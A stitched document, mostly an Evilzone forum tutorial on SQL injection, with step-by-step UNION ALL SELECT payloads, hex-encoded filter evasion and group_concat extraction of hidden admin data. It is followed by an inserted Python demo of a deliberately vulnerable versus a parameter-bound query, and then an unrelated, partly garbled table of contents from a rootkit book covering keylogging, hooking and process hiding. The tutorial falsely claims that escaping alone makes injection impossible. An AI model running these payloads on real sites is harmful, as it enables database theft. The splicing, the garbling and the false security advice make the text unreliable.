Learn more about PHP: http://php.net | PHP - Wikipedia, the free encyclopedia
Learn more about SQL: SQL - Wikipedia, the free encyclopedia
Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia
Learn more about Apache: Apache HTTP Server - Wikipedia, the free encyclopedia

PS. If you want a really quick way of installing all of the elements above, install WAMP for Windows. It's an all-in-one Apache, MySQL and PHP system for Windows. Alternatively, here is a guide to set up Apache + PHP, but no MySQL: Starting PHP scripting - Setting up a PHP environment. In this case you will have to install MySQL yourself, which can be a bit hard if you are a beginner.

1.1 Types of SQL or SQL engines

There are many different variations of SQL. Most of them come from different companies; some are free, some are not. Some are open source, and some are not. It's like everything else really. Some of the different SQL engines are:

Oracle
MSSQL
MySQL
PostgreSQL

I personally use MySQL because it's free and works well with Apache and whatnot. It also has a good syntax. It is also the most used engine so it's what you will most likely encounter when doing injections. All SQL in this tutorial will be MySQL.

Learn more about MySQL: http://mysql.com | MySQL Tutorial - Introduction | MySQL - Wikipedia, the free encyclopedia

1.2 Understanding the SQL structure

The structure of SQL is divided into: servers, databases, tables, columns and rows. A SQL server is software running on a computer waiting for commands from the console or over the internet (or localhost/LAN). A SQL server consists of databases and can contain as many databases as you want. A database consists of tables.
A table consists of columns and rows. Here at Evilzone we use a local SQL server. One of our databases (an SMF forum database) contains these tables:

Quote
    smf_attachments
    smf_ban_groups
    smf_ban_items
    smf_boards
    smf_board_permissions
    smf_calendar
    smf_calendar_holidays
    smf_categories
    smf_collapsed_categories
    smf_log_actions
    smf_log_activity
    smf_log_banned
    smf_log_boards
    smf_log_errors
    smf_log_floodcontrol
    smf_log_karma
    smf_log_mark_read
    smf_log_notify
    smf_log_online
    smf_log_polls
    smf_log_search_messages
    smf_log_search_results
    smf_log_search_subjects
    smf_log_search_topics
    smf_log_topics
    smf_membergroups
    smf_members
    smf_messages
    smf_message_icons
    smf_moderators
    smf_package_servers
    smf_permissions
    smf_personal_messages
    smf_pm_recipients
    smf_polls
    smf_poll_choices
    smf_sessions
    smf_settings
    smf_smileys
    smf_themes
    smf_topics

The table smf_members will most likely contain information about all the members on the forum. A few of the columns smf_members contains:

Quote
    ID_MEMBER
    memberName
    dateRegistered
    posts
    realName
    ICQ
    AIM
    YIM
    MSN
    avatar
    karma

Now a row is one line with all these columns. I'll try to show you with a little ASCII awesomeness here. This entire thing is a table:

 ______________________________________________________
|____ID_____|___Name_____|____Pass___|______Email_______|
|_____0_____|____ande____|___abcgefg__|__abc@gmail.com___|
|_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___|
|_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___|
|_____3_____|___abceqfg__ |___abcgefg__|__abc@gmail.com___|
|_____4_____|___affdeqfg__ |___abcgefg__|__abc@gmail.com___|
|_____5_____|___abhhefg__ |___abcgefg__|__abc@gmail.com___|
|_____6_____|___abaaefg__ |___abcgefg__|__abc@gmail.com___|
|___________|____________|___________|_________________|

In this table the fields ID, Name, Pass and Email are columns. The items downwards are rows.
Row 1: |_____0_____|____ande____|___abcgefg__|__abc@gmail.com___|
Row 2: |_____1_____|___satan911_ |___abcgefg__|__abc@gmail.com___|
Row 3: |_____2_____|___abcgefg__ |___abcgefg__|__abc@gmail.com___|
And so on...

That's pretty much it really. Takes a few brain fluctuations before you will memorize this on your own.

Remember: Server(s) -> Databases -> Tables -> Columns and rows

1.3 Finding vulnerabilities

Before moving on now, it is a GOOD idea for you to learn the basics about both PHP and MySQL (at least look up some code); it is not required to be able to perform SQL injections, however. You will find it much easier to perform more advanced injections later on (and you will actually understand what the fuck is going on behind the scenes!). I will also do this tutorial by showing the server-side code in PHP and MySQL.

Okay, our target! http://evilzone.org! Let's now try to find a page where our target (http://evilzone.org) uses SQL with user inputs. So you are browsing around on the page. You find these links:

Evilzone - Hacking and Security Community - Index (shows an article)
Evilzone - Hacking and Security Community - Index (shows a contact form)
http://evilzone.org/contact.php?do=submit (you come to this link when you click send on the contact form)

Okay, the most common use of SQL is when looking for things like articles, posts, threads, comments, user information, product information and so on. The link index.php?page=contact is probably not SQL based because it's not normal to load entire pages from SQL (can be done though); this link is more likely to be vulnerable to RFI or LFI. But you should still try it nonetheless. The link index.php?do=submit might contain SQL however; then it is most likely a POST SQL injection, which I won't cover in this tutorial. It's very normal to save this kind of information in SQL. Now! The link index.php?id=17! This link almost certainly uses SQL. This is a very common thing to use SQL for.
The SQL query for this case would look a lot like this:

Code:
    SELECT * FROM articles WHERE id='17'

What this does is, it asks the SQL server for all data (*) where the article's ID = 17. Let's say the article table has an ID, subject and text column. The SQL server will then return the id, subject and text data from the table 'articles' where ID is equal to 17. This is the normal way. This is what it does if a normal user browses the page. However, what if we... Let's try to add a ' to the end of the link so the link becomes http://evilzone.org/index.php?id=17'

Now the SQL query would look something like this:

Code:
    SELECT * FROM articles WHERE id='17''

This won't work very well, two 's? The SQL server doesn't understand this so it will now return an error message instead of the data of the article it normally would. So the page will now output something like this (where the article used to be):

Quote
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
    Error no:xxxx

Now, if you are not getting such an error message (any error message is good, it doesn't need to be 100% like the one above), but you are getting a blank page (either in the form of a totally white blank page or a page with no content at the places where there used to be content without the error prefix (')), no worries. It can still be vulnerable. In a lot of cases, the page won't return any error messages, but there can still be an error behind the scenes. Which means it's still vulnerable. Additionally, the ' character is not always the right one to use or is not always enough to cause an error. Further testing is required to determine if the target is vulnerable. On top of that, sometimes, instead of displaying an error message or a blank page, it can do things like redirecting to the main page or something similar.
If you are getting an error message you can jump to the next chapter (1.4 Exploiting vulnerabilities). I do however recommend reading this chapter through. Up to you. You should know what to do when no error message appears.

To determine if a target is vulnerable when it does not output any error message from just adding a ' to the link, you need to first try some other characters; if still no error message, you need to try a few other techniques. Continue reading.

Other error prefixes (like the ') are:

Quote
    "
    \
    /*
    '/*
    "/*
    '--
    "--
    ';
    ";
    --
    ;

If none of the above characters create an error, I highly doubt you will ever get one. Let's move on to some other techniques.

If you are getting a blank page (either a totally white one or a page with no content where there used to be content, without any error prefix), we need to try to "join" the query instead of creating an error. You can do this in a few different ways. Here are the ones I recommend:

Quote
    +order+by+99999
    +or+1=2
    +and+1=2

Don't mind the + sign, it's the equivalent of a space, but if you put a space in your URL, it will become %20, which is a lot harder to read than +.

Now, you use the 3 query injections like this:

Using +order+by+x
The whole point here is to see if we can order the result by something.
First, take your URL: index.php?id=17
Then just try adding +order+by+1
If the page now returns normally, try adding +order+by+99999
If the page now does not load normally, you might have a vulnerable page.

Explanation: +order+by+1 will order the returning results from the MySQL server by column 1. Column 1 must exist because a table cannot have 0 columns. But +order+by+99999 will try to order the results by column nr 99999. This column cannot possibly exist, because that is way over the maximum possible columns in a table. Therefore, this should create an error (or return nothing).
Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +order+by+x in combination with adding ' and " before +order+by+x. Examples:

'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
[...]

Using +or+x=x
The whole point here is to see if we can trick the SQL server into making a question true no matter what.
First, take your URL: index.php?id=17, then change the number (or whatever your URL has as value) into something completely different from its original value. Because this is a number, we will change it into -1. Most likely the SQL server does not have an article with the ID -1. Our URL now looks like this: index.php?id=-1
Then just try adding +or+1=1
If the page now returns normally, try adding +or+1=2
If the page now does not load normally, you might have a vulnerable page.

Explanation: +or+1=1 will always return true. In this example with the query I showed you above this will make the entire query something like this:

Code:
    SELECT * FROM articles WHERE id='-1' or 1=1

So, the SQL server will return all articles where 1=1! This also means you will most likely not get the same article you got the first time, but rather the first article in the database. Or you will get all articles on the same page. Nonetheless, we got ourselves a vulnerable page!

Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +or+1=1 in combination with adding ' and " before +or+1=1. Also try 'a'='a and "a"="a instead of 1=1 (yes, without the last ' and "). Examples:

'+or+1=1
'+or+'a'='a
+or+1=1/*
[...]

Using +and+x=x
The whole point here is to set another condition in the query to see if we can affect the query at all.
First, take your URL: index.php?id=17
Then just try adding +and+1=1
If the page now returns normally, try adding +and+1=2
If the page now does not load normally, you might have a vulnerable page.

Explanation: +and+1=1 will set another requirement in the query.
The query will become like this:

Code:
    SELECT * FROM articles WHERE id='17' and 1=1

But when you put +and+1=2 the query becomes like this:

Code:
    SELECT * FROM articles WHERE id='17' and 1=2

This will of course never be true, because 1 will never be equal to 2. So, if you are able to set your own requirements in the query, we can also do an information retrieval injection, which in the end is what SQL injection is all about: getting information you are not supposed to.

Additionally, you should try the exact same procedure as above just with adding /* and '-- after the +and+x=x in combination with adding ' and " before +and+x=x. Also try 'a'='a and "a"="a instead of 1=1 (yes, without the last ' and "). Examples:

'+and+1=1
'+and+1=1/*
"+and+'a'='a
'+and+"a"="a
[...]

If you, after using at least one of the above techniques, got no indications that the page could be vulnerable, it probably is not vulnerable. Find a new URL!

PS: If you actually learn MySQL syntax and SQL logic you won't have to do as much trial and error as I have described in the techniques above. You will understand how/why the different prefixes work and when they are necessary/required/possible.

1.4 Exploiting vulnerabilities

Once you have found a vulnerable link it is pretty straightforward. (Well, it can be at least. Your injection could be blind and that will make your life a lot harder. Blind injections are NOT covered in this tutorial.)

Just a quick description of blind SQL injection (credits to owasp.org):

Quote
    Overview
    When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead.
    This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

Back to our vulnerable link. It is a good idea to try to visualize what the SQL query looks like. In this case it is pretty easy. But in more advanced injections this really helps out. So again, the query looks like this:

Code:
    SELECT * FROM articles WHERE id='ID'    <- INJECTION GOES HERE

The first thing we need to do is find out how many columns there are in the table 'articles'. This is because we are going to use the UNION ALL SELECT command. What the UNION ALL SELECT command does is that it allows you to SELECT something in the database two times within the same query; it will then return the data of both the SELECT commands as if it was one query. So... In this case we know that the table has 3 columns (ID, subject, text). If we don't know this, there are two things you can do. You can do it by using the ORDER BY command or you can just try it out until your query works. However, I would normally go for the ORDER BY command as this does not create lots of nasty logs and it's faster if it's more than 5 columns or so.

The ORDER BY command does exactly what it sounds like. It orders things alphabetically, numerically or by date/time. It can order by name or offset of a column. That means you can do ORDER BY ID or ORDER BY 1; this will be the same if the column ID is the first column. That again means that we can find out how many columns the table has by trying to order by offsets until we get an error or blank page, starting at something like 5. So here we go:

TIP: Use + instead of space, makes it much cleaner.
Evilzone - Hacking and Security Community - Index : Returns blank page
Evilzone - Hacking and Security Community - Index : Returns normal page
Evilzone - Hacking and Security Community - Index : Returns blank page
Evilzone - Hacking and Security Community - Index : Returns normal page

Okay, so 4 is too high and 2 is too low because 3 obviously worked. Now we know the table has 3 columns!

Now we are almost ready to start getting some juicy data. But I have kinda cheated for you guys. Because normally we don't know what the names of the columns are, I just said they are named ID, subject and text. So we need to look this up. Before we can look up what the column names are, we need to find out what version of MySQL the server is running. The newest one is 5.*** and the one you MIGHT come by is 4.***. We can use the UNION ALL SELECT command already, however it's pointless for data extraction without the column names (actually it's not even possible). But we can get the version without the names. This is what you need to do now:

Evilzone - Hacking and Security Community - Index

There we go, now we used the UNION ALL SELECT command. We do 1,2,3 because it is 3 columns. If it was 5 you will have to do 1,2,3,4,5 and so on... The page now should/may output "2" as subject and "3" as the article text. 1 should not be there because the ID is probably not printed to the page. If the page outputs "2" and "3", then great! Skip past the next text block. If not, read this:

The UNION ALL SELECT doesn't replace the first SELECT, so in some cases (depending on the PHP code) we have to cause a select that will select nothing first. What we can do then is put something like 99999 instead of 17. This will return nothing because article NR 99999 doesn't exist (just make sure 99999 really does not exist). But the union all select will return 1,2,3 and this will be printed to the page instead. Our page now outputs "2" as subject and "3" as article text.
We can now find out what version they are running. This is how you do that:

Evilzone - Hacking and Security Community - Index

Now the text ("3") will be replaced with the information about what version they are running. If the version query returns as 5.*** then you can skip the next block of text; if it returns 4.***, read this:

In MySQL version 4 they did not have the database called 'information_schema', which in version 5 contains all information about all tables and columns (names, ids and more). That means, in version 4 it is impossible to find out the table and column names; the only way to then get any data out is by guessing the table/column names, which is time consuming and may create a lot of logs... If you wish to continue the injection, you should read through the rest and then understand how to guess the names. There are programs to brute force the table and column names.

-------------------------------------------

Okay, before we continue now, I just want to get something off my heart. If you are getting errors from even trying to UNION ALL SELECT anything, and are either getting error messages that say something like "wrong type" or something like that, or are just getting a blank page/redirection:

If the table of the first SELECT command in a query you are trying to UNION ALL SELECT is built in such a way that, let's say, the first two columns are set to be numbers, and the last one is set to be a text value (I am using 3 columns because that's what we are dealing with here), you have to follow that pattern in the UNION ALL SELECT command too. So if the first SELECT is 2 columns of type number and then a text column, your UNION ALL SELECT command has to be alike (UNION ALL SELECT 1,2,'text'). Which means for us that we cannot use the number 2 in the query to get text information from the SQL server. But we will continue this tutorial as if the columns we are using won't create any errors.

We can now "ask" the database 'information_schema' for the column names.
The 'information_schema' database contains a table called 'tables' and a table called 'columns'. The table 'tables' inside the database information_schema contains information about all the tables within all the databases on the server. So to find table names you can "ask" the table 'tables' in the database 'information_schema'. The table 'columns' in the database 'information_schema' contains information about all the columns inside all the tables in all the databases on the server. So to get column names you can "ask" the table 'columns' in the database 'information_schema'.

Note: The table 'columns' in 'information_schema' also contains table names, therefore we can get both column and table names with one query if we want to.

But before we can ask the 'columns' table for column names we need to know what table we want to extract information from. You do that by asking the table 'tables' in the database 'information_schema' for table names. But when doing this without any more requirements than just "give me everything" to the SQL server, it will return ALL table names in the entire server. And that can be a lot on large servers. So... We need to specify our question to the table a bit better.

To get all table names in a specific database you do this:

Code:
    Evilzone - Hacking and Security Community - Index'

This will ask the table 'tables' in 'information_schema' for all table names where the database name is 'DatabaseName'. Remember, databases consist of tables, so each table will always have an owner database.

To ask it for all table names in the current database, the one already used by the original query, you do this:

Code:
    Evilzone - Hacking and Security Community - Index to code tag them because they fucked up the formatting)

The variable database() represents the database in use by the first SELECT command in the query.

TIP: schema means database

Again, before we continue now, I have to make an important note.
If your injections are failing when you have 's or "s in them, you have to convert your arguments to HEX. A lot of things in MySQL can be represented as HEX instead. When you want to represent things as HEX you simply remove the 's or "s and put 0xHEX_NUMBERS instead. The 0x will indicate to the MySQL server that the value is a HEX string. Here is the above link that contained 's in HEX version:

Code:
    Evilzone - Hacking and Security Community - Index

An excellent online text to HEX converter: Convert String To Hexadecimal Online

Continuing...

Now, where the number "3" was, or where originally the article text was, there should now be a table name. Let's say this database contains the tables:

Quote
    articles
    users
    log

Then you should see 'articles' because it is the first table. Okay, so we know the database has a table called 'articles', let's check that one out. Now we need to get the column names for the table 'articles'. To get the column names of a table you do this:

Code:
    Evilzone - Hacking and Security Community - Index'

Note the 's in the query, remember what I wrote about 's and HEX.

Okay, let's break it down a bit. Now we have used the UNION ALL SELECT command and we asked the database 'information_schema' if it has a table called 'columns', and it did, so we asked the table 'columns' if it could give us all the names of the columns in the table called 'articles'.

BTW, concat() will return everything inside it as a merged value. Example: concat('h', 'e', 'll', 'o') will return hello. concat() is not needed in this query but it's a good idea to learn how to use it, as you will need it later.

The place where the number "3" used to be, or the place where the article text is when using the page normally, should now have a name in it. In this case it should have the value 'ID'. This is because the column name 'ID' is the first column in the table 'articles'. So now we know one of the column names in the table.
To get the rest we have to use the LIMIT command. The LIMIT command will return a limited/selected amount of rows from a table. Example: We have a table with only one column, the column is called ID. We have 10 rows:

 ____
|ID_|
|_1_|
|_2_|
|_3_|
|_4_|
|_5_|
|_6_|
|_7_|
|_8_|
|_9_|
|_10|

If we do:

Code:
    SELECT * FROM TheTableAbove LIMIT 0,5

It will return the rows 1 to 5.

If we do:

Code:
    SELECT * FROM TheTableAbove LIMIT 5,5

It will return the rows 5 to 10.

Now, back to getting the column names. Let's try to get column name NR 2; NR 1 is 'ID', we got that from the previous query.

Code:
    Evilzone - Hacking and Security Community - Index

This should return the name 'subject'. This is because the column 'subject' is column NR 2. So by limiting the result from result 1 (0 is the first) and then giving us the next 1 result(s) we get 'subject'. To get the last column name we limit it 2,1.

Code:
    Evilzone - Hacking and Security Community - Index

This should return 'text'. Again this is because we now are limiting the results from the server by row NR 2 and ask for the 1 next result(s).

Alright, so the situation is:

We want to check out a table called 'articles'. We got the table name from asking the table 'tables' in the database 'information_schema'.
The table 'articles' has these columns: ID | subject | text
We got the column names from asking the table 'columns' in the database 'information_schema' for all column names in the table 'articles'.

Now! All we need to do is extract what we want. Although this table is 99% likely not interesting at all, we are now gonna try to extract all the info out of article NR 23; this is because we act like that article is for admins only, but we want to read it anyway. To extract information you do like this:

Code:
    Evilzone - Hacking and Security Community - Index, subject, text)+FROM+articles+WHERE+ID=23

Now you will see an almost normal looking article, however the subject will still be "2".
But the text will now look like this (let's say that the subject is "admin passwords" and the text is "abcabcabc"):

Quote
    23admin passwordsabcabcabc

This is because we asked for the ID which is 23, then the subject which is "admin passwords" and then the text which is "abcabcabc". This is a bit messy... So let's try to clean things up by splitting the 3 columns with a '<br /><br />':

Code:
    http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(ID,'<br /><br/>',subject,'<br /><br />',text,'<br /><br />')+FROM+articles+WHERE+ID=23

(Remember the HEX thing? Most likely you will have to use that here.)

HEX version:

Code:
    Evilzone - Hacking and Security Community - Index

Now you will see this:

Quote
    23
    admin passwords
    abcabcabc

I know this information wasn't all that interesting but this is basically how you do it! Let's say you want to check if the database has a user information table. Then you simply use the limit command on the:

Quote
    http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='DatabaseName'

OR

Quote
    http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()

And repeat the whole process all over again.

Okay. I have a confession to make. The method you guys learned now is the very hard way. But I wanted you to know how to do it that way because sometimes it's necessary. And I know you would have just skipped to the easy version if I told you earlier.

Up to now we have used the concat() function to group up different columns into one. But this does not limit the amount of rows the SQL server returns. So (depending on the PHP code) we will only get the first row of the returned results printed to the page. It depends on the PHP code: whether it is coded in such a way that it will only output the first row, or whether it will loop through all the rows and print them out.
Either way, I will introduce you to a new function: the group_concat() function. This will not only allow you to group up multiple columns and values into one, but also group up rows, so you don't have to use the LIMIT at the end and send a million requests. However, I must warn you. The group_concat default max length is only 1024 characters. That's why it's very often necessary to do it the hard way, with LIMIT. If the returned value is more than 1024 characters the rest will just be discarded. Nonetheless, this is how you do it:

Remember the 'article' table from above? Well, let's try getting all its column names from 'information_schema.columns' instead of doing LIMIT:

Code:
    Evilzone - Hacking and Security Community - Index'

This should now return as:

Quote
    ID,subject,text

Now we have gotten, in one request, the same amount of information that we had to send three requests for last time! This method can be used in all the other queries above too.

1.5 Securing vulnerabilities

What every PHP coder (and any other web page coder) should ALWAYS do: strip/check/secure ALL user inputs!

Instead of doing:

Code:
    $variable = $_GET['Some_user_input_name'];

Do:

Code:
    $variable = mysql_real_escape_string($_GET['Some_user_input_name']);

The mysql_real_escape_string() function will prohibit any escape character (' or " or \ etc.) from doing any damage. And therefore an injection is impossible. And remember to use ' around the variable like this:

Code:
    db_query("SELECT * FROM Somewere WHERE Something='".$variable."'");

Use of the is_numeric() function where the inputs are always going to be numbers either way is also a good idea. And also check the number length; your number should never be so high that it starts using e's (51.315+315e). So a simple if ($num > 99999999999) { die(); } will work fine.

Other inputs are:

Quote
    $_POST['']
    $_COOKIE['']
    $_FILES['']
    $_REQUEST['']
    $_SESSION['']

It is so god damn easy, so why people do not do it is a mystery to me.
Source: SQL Injection
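To show in runnable form what section 1.5 of the tutorial above is protecting against, here is an added example that is not part of ande's tutorial. It uses Python's sqlite3 module in place of PHP and MySQL: the articles table with ID, subject and text columns mirrors the tutorial's example, the three rows are constructed sample data, and the hardened lookup uses a bound parameter (the sqlite3 equivalent of a mysqli/PDO prepared statement) together with the numeric check the tutorial recommends. The function names and the 99999999999 ceiling are this example's own choices.

```python
"""Vulnerable article lookup beside its hardened form (added example).

Not from the evilzone tutorial. sqlite3 stands in for PHP/MySQL; the table
layout (ID, subject, text) and the sample rows are constructed for the demo.
"""
import sqlite3

# Constructed sample data mirroring the tutorial's 'articles' table.
SAMPLE_ARTICLES = [
    (17, "Public article", "Hello world"),
    (23, "admin passwords", "abcabcabc"),
    (42, "Another article", "Nothing to see"),
]

MAX_ARTICLE_ID = 99999999999  # the tutorial's sanity ceiling for numeric ids


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (ID INTEGER PRIMARY KEY, subject TEXT, text TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    conn.commit()
    return conn


def fetch_article_vulnerable(conn, user_input):
    """The tutorial's pattern: user input pasted straight into the SQL text.

    This is the Python equivalent of PHP's "SELECT * FROM articles WHERE id='$id'".
    Anything the caller types becomes part of the query, so a quote followed by
    OR '1'='1 turns a one-row lookup into a dump of the whole table.
    """
    query = f"SELECT * FROM articles WHERE ID='{user_input}'"
    return conn.execute(query).fetchall()


def fetch_article_bound(conn, user_input):
    """Parameter binding: the input travels as data and is never parsed as SQL.

    The driver sends the placeholder and the value separately, so the same
    injection string is simply compared against the ID column and matches nothing.
    """
    query = "SELECT * FROM articles WHERE ID = ?"
    return conn.execute(query, (user_input,)).fetchall()


def is_valid_article_id(user_input):
    """The tutorial's is_numeric() plus length check, as a reusable predicate."""
    if not isinstance(user_input, str) or not user_input.isdigit():
        return False
    return int(user_input) <= MAX_ARTICLE_ID


def fetch_article_safe(conn, user_input):
    """Validate first, then bind: rejects non-numeric input before any SQL runs."""
    if not is_valid_article_id(user_input):
        raise ValueError("article id must be a non-negative integer within range")
    return fetch_article_bound(conn, int(user_input))


if __name__ == "__main__":
    db = make_db()
    probe = "-1' OR '1'='1"
    print("vulnerable:", len(fetch_article_vulnerable(db, probe)), "rows for", repr(probe))
    print("bound:     ", len(fetch_article_bound(db, probe)), "rows for", repr(probe))
    print("safe:      ", fetch_article_safe(db, "23"))
```

Binding alone already defeats the tautology, because the database never sees the input as SQL; the numeric check on top of it is still worth keeping, since it turns a malformed request into an explicit error at the application boundary instead of a silently empty result.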
  22. The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System
Reverend Bill Blunden

Contents

Preface: Metadata

Part I - Foundations

Chapter 1 Setting the Stage
  1.1 Forensic Evidence
  1.2 First Principles
    Semantics
    Rootkits: The Kim Philby of System Software
    Who Is Using Rootkit Technology?
      The Feds
      The Spooks
      The Suits
  1.3 The Malware Connection
    Infectious Agents
    Adware and Spyware
    Rise of the Botnets
    Malware versus Rootkits
    Job Security: The Nature of the Software Industry
  1.4 Closing Thoughts

Chapter 2 Into the Catacombs: IA-32
  2.1 IA-32 Memory Models
    Physical Memory
    Flat Memory Model
    Segmented Memory Model
    Modes of Operation
  2.2 Real Mode
    Case Study: MS-DOS
    Isn't This a Waste of Time? Why Study Real Mode?
    The Real-Mode Execution Environment
    Real-Mode Interrupts
    Segmentation and Program Control
    Case Study: Dumping the IVT
    Case Study: Logging Keystrokes with a TSR
    Case Study: Hiding the TSR
    Case Study: Patching the tree.com Command
    Synopsis
  2.3 Protected Mode
    The Protected-Mode Execution Environment
    Protected-Mode Segmentation
    Protected-Mode Paging
    Protected-Mode Paging: A Closer Look
  2.4 Implementing Memory Protection
    Protection through Segmentation
      Limit Checks
      Type Checks
      Privilege Checks
      Restricted-Instruction Checks
      Gate Descriptors
      Protected-Mode Interrupt Tables
    Protection through Paging
    Summary

Chapter 3 Windows System Architecture
  3.1 Physical Memory
    Physical Address Extension (PAE)
    Data Execution Prevention (DEP)
    Address Windowing Extensions (AWE)
    Pages, Page Frames, and Page Frame Numbers
  3.2 Memory Protection
    Segmentation
    Paging
    Linear to Physical Address Translation
      Longhand Translation
      A Quicker Approach
      Another Quicker Approach
  3.3 Virtual Memory
    User Space Topography
    Kernel Space Dynamic Allocation
    Address Space Layout Randomization (ASLR)
  3.4 User Mode and Kernel Mode
    How versus Where
    Kernel-Mode Components
    User-Mode Components
  3.5 The Native API
    The IVT Grows Up
    Hardware and the System Call Mechanism
    System Call Data Structures
    The SYSENTER Instruction
    The System Service Dispatch Tables
    Enumerating the Native API
    Nt*() versus Zw*() System Calls
    The Life Cycle of a System Call
    Other Kernel-Mode Routines
    Kernel-Mode API Documentation
  3.6 The Boot Process
    Startup for BIOS Firmware
    Startup for EFI Firmware
    The Windows Boot Manager
    The Windows Boot Loader
    Initializing the Executive
    The Session Manager
    Wininit.exe
    Winlogon.exe
    The Major Players
  3.7 Design Decisions
    How Will Our Rootkit Execute at Run Time?
    What Constructs Will Our Rootkit Manipulate?

Chapter 4 Rootkit Basics
  4.1 Rootkit Tools
    Development Tools
    Diagnostic Tools
    Reversing Tools
    Disk Imaging Tools
    Tool Roundup
  4.2 Debuggers
    Configuring Cdb.exe
      Symbol Files
      Windows Symbols
      Invoking Cdb.exe
      Controlling Cdb.exe
    Useful Debugger Commands
      Examine Symbols Command (x)
      List Loaded Modules (lm and !lmi)
      Display Type Command (dt)
      Unassemble Command (u)
      Display Command (d*)
      Registers Command (r)
    The Kd.exe Kernel Debugger
      Different Ways to Use a Kernel Debugger
      Configuring Kd.exe
      Preparing the Hardware
      Preparing the Software
      Launching a Kernel Debugging Session
      Controlling the Target
    Useful Kernel-Mode Debugger Commands
      List Loaded Modules Command (lm)
      !process
      Registers Command (r)
    Working with Crash Dumps
      Method 1
      Method 2
      Crash Dump Analysis
  4.3 A Rootkit Skeleton
    Kernel-Mode Driver Overview
    A Minimal Rootkit
    Handling IRPs
      DeviceType
      Function
      Method
      Access
    Communicating with User-Mode Code
    Sending Commands from User Mode
    Source Code Organization
    Performing a Build
      WDK Build Environments
      Build.exe
  4.4 Loading a KMD
    The Service Control Manager (SCM)
      Using sc.exe at the Command Line
      Using the SCM Programmatically
      Registry Footprint
    ZwSetSystemInformation()
    Writing to the \Device\PhysicalMemory Object
    Modifying Driver Code Paged to Disk
    Leveraging an Exploit in the Kernel
  4.5 Installing and Launching a Rootkit
    Launched by the Operating System
    Launched by a User-Mode Application
      Use the SCM
      Use an Auto-Start Extensibility Point (ASEP)
      Install the Launcher as an Add-On to an Existing Application
    Defense in Depth
    Kamikaze Droppers
    Rootkit Uninstall
  4.6 Self-Healing Rootkits
    Auto-Update
  4.7 Windows Kernel-Mode Security
    Kernel-Mode Code Signing (KMCS)
    Kernel Patch Protection (KPP)
    Restricted Access to \Device\PhysicalMemory
  4.8 Synchronization
    Interrupt Request Levels
    Deferred Procedure Calls (DPCs)
    Implementation
  4.9 Commentary

Part II - System Modification

Chapter 5 Hooking Call Tables
  5.1 Hooking in User Space: The IAT
    DLL Basics
    Accessing Exported Routines
      Load-Time Dynamic Linking
      Run-Time Dynamic Linking
    Injecting a DLL
      The AppInit_DLLs Registry Value
      The SetWindowsHookEx() API Call
      Using Remote Threads
    PE File Format
      The DOS HEADER
      RVAs
      The PE Header
      Walking through a PE on Disk
    Hooking the IAT
  5.2 Hooking in Kernel Space
    Hooking the IDT
      Handling Multiple Processors - Solution 1
. . . . . 271 Naked Routines . . . . . . . . . . . . . . . . . . . . . . . . . . 276 Issues with Hooking the IDT . . . . . . . . . . . . . . . . . . 278 Hooking Processor MSRs . . . . . . . . . . . . . . 279 Handling Multiple Processors - Solution 2 . . 282 Hooking the SSDT. . . . . . . . . . . . . . 286 Disabling the WP Bit - Technique 1 . . 288 Disabling the WP Bit - Technique 2 . . 289 Hooking SSDT Entries . . . . . . . . . . 291 SSDT Example: Tracing System Calls. . ... 293 SSDT Example: Hiding a Process. . . . . . . . . . . .... 296 ix Contents Chapter 6 x SSDT Example: Hiding a Directory . . . . . . . SSDT Example: Hiding a Network Connection. Hooking IRP Handlers . . . . . . . . . . . Hooking the GDT - Installing a Call Gate 5.3 Hooking Countermeasures . . . . . Checking for Kernel-Mode Hooks. Checking IA32 _ SYSENTER EIP. Checking INT Ox2E . . . Checking the SSDT . . . . . . . Checking IRP Handlers . . . . . Checking for User-Mode Hooks Parsing the PEB - Part 1. . Parsing the PEB - Part 2. . 5.4 Counter-Countermeasures . Patching System Routines. . . . . . . . . Binary Patching versus Run-time Patching The Road Ahead . . 6.1 Run-time Patching. Detour Patching . . Detour Jumps ... Example 1: Tracing Calls Detour Implementation. Acquire the Address of the NtSetValueKeyO . Initialize the Patch Metadata Structure . . . . · 301 .305 . 306 . 308 · 317 · 318 · 321 . 322 . 324 . 325 .327 .330 .336 .337 . .. . 339 . 340 .340 .340 · 341 .344 . 346 · 351 .354 .354 Verify the Original Machine Code against a Known Signature . 356 Save the Original Prolog and Epilog Code. Update the Patch Metadata Structure. . . Lock Access and Disable Write Protection Inject the Detours . The Prolog Detour . The Epilog Detour . Post-Game Wrap-Up Example 2: Subverting Group Policy. . . Detour Implementation. . . . . . . . . Initializing the Patch Metadata Structure . The Epilog Detour . . . . . . . . . . . . . Mapping Registry Values to Group Policies. Example 3: Granting Access Rights . 
